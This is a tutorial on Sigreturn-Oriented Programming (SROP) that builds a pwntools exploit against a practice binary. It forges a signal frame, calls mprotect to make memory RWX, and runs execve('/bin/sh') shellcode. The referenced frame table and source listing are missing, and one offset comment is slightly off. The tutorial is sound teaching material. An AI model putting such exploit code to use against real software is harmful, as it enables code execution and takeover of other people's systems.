Sigreturn-Oriented Programming (SROP)

This is a technique which can be used when there are few or not particularly useful gadgets. It requires only 2 gadgets: a way to manipulate rax and a syscall. The trade-off, however, is that it requires a bigger overflow depending on what you want to achieve.

When a signal occurs in Linux, the kernel stores the state of the process by constructing a Signal Frame on the stack. Once the signal has been processed, the rt_sigreturn syscall is envoked to restore the process's state from the stack. rt_sigreturn, however, does not check whether or not the state it is restoring from the stack is the same as the state that the kernel pushed onto it. Usually, this is not a problem because rt_sigreturn is never called without a signal having been processed - the syscall for it in libc is actually defined to just return an error code. Interestingly enough, there are also no protection mechanism to ensure that rt_sigreturn is called only after a signal has been processed which means that nothing is stopping an adversary from calling it and modifying the process's state by manipulating what is on the stack.

The Signal Frame

The signal frame represents the state of a process which is backed up onto the stack when a signal needs to be handled and has the following format:

When rt_sigreturn is invoked, the top 248 bytes of the stack will be restored into the above locations.

The Exploit

Consider the following programme:

The highlighted code allows an adversary to read 768 bytes into a buffer of size only 32, which results in a buffer overflow. In order to trigger the buffer overflow, we can inspect the code and calculate (alternatively you can fuzz the programme) the number of padding bytes which we will need - this turns out to be 40. Since the NX is enabled, we will need to build a ROP chain. Unfortunately, there is a little snag - there are barely any gadgets available.

So we will have to be more sophisticated and use Sigreturn-oriented programming. We see that there is a readily-available syscall gadget, but there is no straightforward way to manipulate the rax registered which is needed for issuing syscalls.

Upon further inspection, the loc.write procedure invokes sys_write which is lucky for us because if sys_write is successful, it returns the number of characters written in rax. Now that we know how to manipulate rax, we turn our attention to the construction of our ROP chain.

The ROP chain begins by invoking loc.vuln again, so that it may in turn invoke loc.write. Once loc.vuln is called, the programme will ask us for input. We need to send 14 characters (the 15-th being the \n at the end) to it, so that loc.write can then print those 15 characters and set rax equal to 15 as a result. Once these characters have been written, loc.vuln will return execution to our ROP chain. Since rax now contains the syscall number of rt_sigreturn, namely 15, the next instruction in the ROP chain should be syscall.

rt_sigreturn will take the top 248 bytes of the stack and attempt to restore the state of the process from them. This means that all registers will be overwritten with values from the stack. Since we control what is on the stack via the buffer overflow, we also control what gets put into those registers. Therefore, the payload for the ROP chain should also contain an artificial signal frame after the syscall instruction, which will be the top of the stack.

From here on, all that is left is figuring out a quick way to get a shell. I have opted for some shellcode which invokes execve with "/bin/sh". To do this we need to use sys_mprotect to change the permissions of a memory region to read-write-execute. Therefore, the registers inside our malicious signal frame should contain the following values:

  • rax - 0xA (the number for the sys_mprotect system call)
  • rdi - the beginning of the memory region whose permissions we want to change
  • rsi - the size of the memory region
  • rdx - 0x7 (RWX permissions)
  • rip - the address of the syscall gadget

Now, it would have been nice if we had a way to preserve the value of the stack pointer, but that is not possible. Since we are forced to overwrite it, however, we might as well make do with what we can. We have no way of referring to the stack prior to rt_sigreturn, so we will just invent a new one!

In order to achieve this, we need to find a location in memory which contains the address of loc.vuln, even if it does so only coincidentally. The reason for this is that, after rt_sigreturn finishes, rip will be set to the syscall gadget which will execute sys_mprotect. The instruction after the syscall is a ret which means that the value of the location pointed to by rsp will be copied to rip, and we want it to then proceed again with the execution of loc.vuln. Hence why rsp should contain a pointer to the address of loc.vuln.

Now that memory is executable, we proceed by exploiting loc.vuln yet another time in order to execute the shellcode which spawns a shell.

With this information we can construct an exploit using pwntools:

from pwn import *

context.clear(arch='amd64')

p = process("./srop")

syscall_address = 0x401014 # &syscall
sigreturn_number = 0xF
mprotect_number = 0xA
mprotect_permissions = 0x7

vuln_address = 0x40102e # &loc.vuln()
pointer_to_vuln_address = 0x4010d8 # &&loc.vuln() - using a debugger, I found that this location contains 0x40102e at runtime

padding = b'A' * 40

signal_frame = SigreturnFrame(kernel="amd64")
signal_frame.rax = mprotect_number
# It does not matter what memory we make RWX, but for simplicity, we are just going to make a huge chunk from the beginning of the binary executable. We just need to make sure that the new stack will be contained in it.
signal_frame.rdi = 0x400000 # Beginning of the memory block (in this case, the binary)
signal_frame.rsi = 0x10000 # Size of the memory block
signal_frame.rdx = mprotect_permissions
signal_frame.rip = syscall_address # This will proceed to execute sys_mprotect
signal_frame.rsp = pointer_to_vuln_address # Beginning of the new stack

payload = padding + p64(vuln_address) + p64(syscall_address) + bytes(signal_frame)
p.sendline(payload)
p.recv()

# Send 15 characters (14*'A' + '\n')
p.sendline(b'A' * (sigreturn_number - 1))
p.recv()

# Remove the comments in the assembly in order for it to compile
shellcode = asm("""
mov rdi, 0x68732f6e69622f ; '/bin/sh\x00' in little-endian
push rdi
mov rdi, rsp
mov rax, 0x3b ; execve syscall number
xor rsi, rsi
xor rdx, rdx
syscall
""", arch="amd64")

# The stack pointer will be moved 40 bytes down and the padding will take those 40 bytes, reaching pointer_to_vuln_address. We then add 1 byte for the value contained at pointer_to_vuln_address itself and then add 1 more byte to make room for the actual shellcode_address.
shellcode_address = pointer_to_vuln_address + 0x10

payload = b'A'*40 + p64(shellcode_address) + shellcode
p.sendline(payload)

p.interactive()